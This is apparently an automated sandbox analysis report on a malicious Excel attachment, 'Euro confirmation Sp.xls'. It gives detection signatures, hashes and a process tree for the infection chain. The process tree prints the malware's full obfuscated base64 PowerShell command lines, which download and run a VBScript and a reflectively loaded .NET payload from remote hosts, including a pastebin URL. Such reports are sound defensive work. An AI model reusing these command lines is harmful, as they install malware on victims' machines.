Edit tour

Windows Analysis Report
Euro confirmation Sp.xls

Overview

General Information

Sample name:	Euro confirmation Sp.xls
Analysis ID:	1574071
MD5:	ee0c6a4698481c48bbc55b9a33589a54
SHA1:	2abeddd26326a6dd0511c67069b0b21837e047b1
SHA256:	65e15997e0ceb72609fc8a3c0cc0453ca08d98d16485163863325fba17bda28a
Tags:	xlsuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected obfuscated html page

Connects to a pastebin service (likely for C&C)

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Microsoft Office drops suspicious files

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Compiles C# or VB.Net code

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3588 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

mshta.exe (PID: 3880 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

cmd.exe (PID: 3980 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 4004 cmdline: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 3144 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 3164 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 3380 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" MD5: 045451FA238A75305CC26AC982472367)

powershell.exe (PID: 2956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule MD5: A575A7610E5F003CC36DF39E07C4BA7D)

mshta.exe (PID: 2692 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

cmd.exe (PID: 364 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 1916 cmdline: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 2748 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 2912 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC91.tmp" "c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 3704 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" MD5: 045451FA238A75305CC26AC982472367)

powershell.exe (PID: 1732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule MD5: A575A7610E5F003CC36DF39E07C4BA7D)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 2956	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2956	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x7f9a:$b2: ::FromBase64String( 0x8002:$b2: ::FromBase64String( 0x9a00:$b2: ::FromBase64String( 0x17d68:$b2: ::FromBase64String( 0x1854f:$b2: ::FromBase64String( 0x413f3:$b2: ::FromBase64String( 0x46478:$b2: ::FromBase64String( 0x5f6b8:$b2: ::FromBase64String( 0x5fd28:$b2: ::FromBase64String( 0x76b95:$b2: ::FromBase64String( 0x7f199:$b2: ::FromBase64String( 0x7fe1:$b3: ::UTF8.GetString( 0x99df:$b3: ::UTF8.GetString( 0x17d47:$b3: ::UTF8.GetString( 0x1852e:$b3: ::UTF8.GetString( 0x413d2:$b3: ::UTF8.GetString( 0x462b1:$b3: ::UTF8.GetString( 0x5f697:$b3: ::UTF8.GetString( 0x5fd07:$b3: ::UTF8.GetString( 0x76b74:$b3: ::UTF8.GetString( 0x7f178:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 1732	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1732	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x893:$b2: ::FromBase64String( 0xf03:$b2: ::FromBase64String( 0xe8d0:$b2: ::FromBase64String( 0xf0b3:$b2: ::FromBase64String( 0x264a4:$b2: ::FromBase64String( 0x2650c:$b2: ::FromBase64String( 0x2790e:$b2: ::FromBase64String( 0x27f80:$b2: ::FromBase64String( 0x3065f:$b2: ::FromBase64String( 0x37080:$b2: ::FromBase64String( 0x4b0a5:$b2: ::FromBase64String( 0x872:$b3: ::UTF8.GetString( 0xee2:$b3: ::UTF8.GetString( 0xe8af:$b3: ::UTF8.GetString( 0xf092:$b3: ::UTF8.GetString( 0x264eb:$b3: ::UTF8.GetString( 0x278ed:$b3: ::UTF8.GetString( 0x27f5f:$b3: ::UTF8.GetString( 0x3063e:$b3: ::UTF8.GetString( 0x3705f:$b3: ::UTF8.GetString( 0x4aede:$b3: ::UTF8.GetString(

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 